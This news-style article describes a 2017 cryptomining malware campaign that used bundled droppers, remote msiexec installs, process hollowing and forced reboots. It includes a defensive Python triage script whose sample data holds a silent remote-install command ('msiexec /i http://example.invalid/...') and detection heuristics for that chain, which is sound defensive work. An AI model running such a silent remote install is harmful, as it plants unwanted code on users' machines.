Thousands of computers have been secretly hijacked for cybercriminal activity. Cryptocurrency mining malware applies sophisticated methods that have been used before, and those behind the operations are making millions of dollars from it.
What makes mining malware so successful is that it hides inside the PC. Users do not notice what is going on, despite the increased activity of the cooling fan, and they rarely treat that as a real problem. This allows cyber crooks to collect huge amounts of money.
One such operation was recently discovered. The threat actors behind it, who have not been given a name, are considered a "sophisticated" group, and the campaign is thought to be the most profitable cryptocurrency mining activity found so far. The security company Kaspersky Lab suggested it might have allowed the cybercriminals to make millions during the first half of 2017.
Perhaps the main reason the cryptocurrency mining operation is so profitable is the installation method. The malware is installed with advanced techniques that are also used by state-backed specialists and hackers.
The malware takes hold of the PC through process hollowing: it removes the legitimate code of a running process and substitutes malicious code in its place.
First, targeted users are lured into downloading legitimate software. While the user follows the installation instructions, the miner is installed alongside it, which is what makes it hard for anti-virus programs to detect.
Right after the dropper software is installed, a remote server completes the installation by running the Windows installer, `msiexec`. It downloads and deploys additional modules that carry out the process hollowing. At this point, the attackers replace the process's code with instructions for mining cryptocurrency.
The attackers also take measures to make sure the cryptocurrency mining malware stays installed: the Windows system is set to reboot if the user tries to stop the process. This makes it very hard for anti-virus software to detect and remove it.
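As an added example (not from the article or from Kaspersky Lab), the following Python triage script shows how a defender could screen process telemetry for the delivery chain described above: a dropper in a user profile launching `msiexec` against a remote package, a process whose in-memory image no longer matches its on-disk file (a hollowing indicator), and sustained high CPU from that process. The record fields and the sample events are constructed assumptions, not real telemetry.

```python
"""Heuristic triage of process telemetry for a miner delivered via
msiexec and process hollowing. Field names and sample data are assumed."""
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # executable path the process claims to run from
    cmdline: str
    disk_sha256: str    # hash of the file on disk
    mem_sha256: str     # hash of the mapped image in memory (assumed telemetry)
    cpu_pct: float      # average CPU over the sampling window

def triage(events):
    """Return {pid: [reasons]} for every event matching at least one indicator."""
    by_pid = {e.pid: e for e in events}
    findings = {}
    def flag(e, reason):
        findings.setdefault(e.pid, []).append(reason)
    for e in events:
        name = e.image.rsplit("\\", 1)[-1].lower()
        parent = by_pid.get(e.ppid)
        cmd = e.cmdline.lower()
        # msiexec pulling a package from a remote server instead of a local .msi
        if name == "msiexec.exe" and ("http://" in cmd or "https://" in cmd):
            flag(e, "msiexec installing from remote URL")
        # msiexec spawned by something running out of the user profile (dropper)
        if name == "msiexec.exe" and parent and "\\appdata\\" in parent.image.lower():
            flag(e, f"msiexec spawned by {parent.image} in user profile")
        # hollowing: the mapped image differs from the file the process claims to be
        if e.disk_sha256 != e.mem_sha256:
            flag(e, "in-memory image differs from on-disk file (possible hollowing)")
        # sustained CPU consumption typical of a miner (the "fan noise" symptom)
        if e.cpu_pct >= 80.0:
            flag(e, f"sustained CPU {e.cpu_pct:.0f}%")
    return findings

# Constructed sample telemetry (not real data); hashes are placeholders
SAMPLE = [
    ProcEvent(400, 300, r"C:\Windows\explorer.exe", "explorer.exe", "aaa", "aaa", 2.0),
    ProcEvent(500, 400, r"C:\Users\u\AppData\Local\Temp\setup.exe", "setup.exe", "bbb", "bbb", 5.0),
    ProcEvent(600, 500, r"C:\Windows\System32\msiexec.exe",
              "msiexec /i http://example.invalid/pkg.msi /qn", "ccc", "ccc", 3.0),
    ProcEvent(700, 600, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs",
              "ddd", "eee", 97.0),
]

if __name__ == "__main__":
    for pid, reasons in triage(SAMPLE).items():
        print(pid, reasons)
```

Each indicator on its own produces false positives (legitimate installers do fetch packages over HTTP), so the value is in the chain: a user-profile dropper, then msiexec, then a mismatched, CPU-hungry child.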
Only six months were needed for the attackers to make millions of dollars. They targeted a network of PCs that had been used by a number of actors who were able to access them.
The huge return achieved through cryptocurrency mining resembles that of the most profitable ransomware frauds of 2017.
In general, the high-ranking, most profitable ransomware campaigns have declined, while cryptocurrency mining malware has increased. This shows how hackers shift from one method to another to obtain illicit income. However, some high-profile schemes remain the same.
Evolution of ransomware
Methods and schemes for spreading mining software get more sophisticated every day. Cybercriminals are constantly changing them, as ransomware attackers did in the past. These are well-known tricks that were used in similar cases, as Anton Ivanov from Kaspersky Lab points out.
Kaspersky Lab statistics from 2017 show that 2.7 million users were affected. Compared with the previous year, this represents an increase of 59 percent.